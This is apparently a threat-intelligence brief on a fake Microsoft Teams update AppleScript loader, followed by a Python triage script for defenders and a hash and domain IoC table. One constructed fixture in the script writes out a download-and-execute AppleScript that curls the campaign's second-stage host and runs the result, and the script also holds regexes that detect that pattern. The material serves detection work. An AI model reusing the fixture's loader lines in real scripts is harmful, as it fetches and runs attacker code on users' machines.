North Korean hackers are pushing fake Microsoft Teams Update to macOS users
2025-12-04 • Moonlock
A macOS campaign described as consistent with DPRK recruitment and crypto-targeting activity used a fake “Microsoft Teams Update” AppleScript loader named Microsoft Teams Update.scpt. The script was branded as a Microsoft Teams Live SDK update and opened a legitimate Microsoft Teams page in the background to make the activity appear normal to the user. Its malicious logic used curl -L -k to fetch a second-stage script from support.ms-live[.]com/519738/check and executed the downloaded content through AppleScript. The source provides the SHA-256 hash d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624 and related loader hashes, giving defenders concrete macOS artifacts for hunting.
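A defender-side triage for AppleScript sources, added here as an example and not part of the Moonlock write-up: it matches plaintext or decompiled AppleScript against the loader hash and second-stage host given above, then flags the behaviours the paragraph describes (curl with -k, fetched text handed to run script, a decoy web page opened alongside the shell activity). The two fixtures are constructed, and the function names and heuristics are my own, not the campaign's code.

```python
import hashlib
import re

# One full SHA-256 from the write-up (the loader); the table's other hashes are truncated.
KNOWN_LOADER_SHA256 = {"d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624"}
# Second-stage host from the write-up, kept defanged as a feed would ship it.
KNOWN_DOMAINS = {"support.ms-live[.]com"}

RE_CURL_INSECURE = re.compile(r"\bcurl\b[^\n]*?(?:\s-[A-Za-z]*k[A-Za-z]*\b|\s--insecure\b)")
RE_DO_SHELL = re.compile(r"\bdo shell script\b")
RE_RUN_SCRIPT = re.compile(r"\brun script\b")
RE_OPEN_LOCATION = re.compile(r"\bopen location\b")

def refang(indicator: str) -> str:
    """Turn a defanged indicator (support.ms-live[.]com) back into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

def triage(text: str, known_hashes=KNOWN_LOADER_SHA256, known_domains=KNOWN_DOMAINS) -> dict:
    """Score one AppleScript source (e.g. the output of `osadecompile file.scpt`)."""
    reasons, heuristics = [], []  # reasons = IoC hits, heuristics = behavioural signals
    digest = sha256_hex(text)
    if digest in known_hashes:
        reasons.append("sha256 matches known loader hash")
    for dom in known_domains:
        if refang(dom) in text:
            reasons.append(f"references known second-stage host {refang(dom)}")
    if RE_CURL_INSECURE.search(text):
        heuristics.append("curl -k/--insecure: TLS certificate validation disabled")
    if RE_DO_SHELL.search(text) and RE_RUN_SCRIPT.search(text):
        heuristics.append("shell output passed to 'run script': downloaded code executed")
    if RE_OPEN_LOCATION.search(text) and RE_DO_SHELL.search(text):
        heuristics.append("opens a web page alongside shell commands: decoy pattern")
    verdict = "malicious" if reasons else ("suspicious" if heuristics else "clean")
    return {"sha256": digest, "reasons": reasons, "heuristics": heuristics, "verdict": verdict}

# Constructed fixtures (not the real loader's source), shaped after the write-up's description.
SAMPLE_LOADER_LIKE = """\
-- "Microsoft Teams Live SDK Update"
open location "https://www.microsoft.com/microsoft-teams/"
set stage2 to do shell script "curl -L -k https://support.ms-live.com/519738/check"
run script stage2
"""
SAMPLE_BENIGN = """\
set ver to do shell script "curl -sL https://example.com/version.txt"
display dialog "Latest version: " & ver
"""
```

On a real host, feed it `osadecompile` output for each `.scpt` under the user's Downloads and Library folders; a hash hit or domain hit is a confirmed indicator, while heuristic-only hits deserve a manual look.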
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 9135fb9e74bdb39828bfecf79194300… | 2025-12-04 | 2025-12-04 |
| HASH | 14aba88b5f87ab9415bbca855d24abc… | 2025-12-04 | 2025-12-04 |
| HASH | 81c4ce82fe26e333a46e8a3d876e35b… | 2025-12-04 | 2025-12-04 |
| HASH | d4310e8286fc3e29c7dce8ed8ccffe3… | 2025-12-04 | 2025-12-04 |
| URL | https://support.ms-live.com/519… | 2025-12-04 | 2025-12-04 |
| DOMAIN | support.ms-live.com | 2025-12-04 | 2025-12-04 |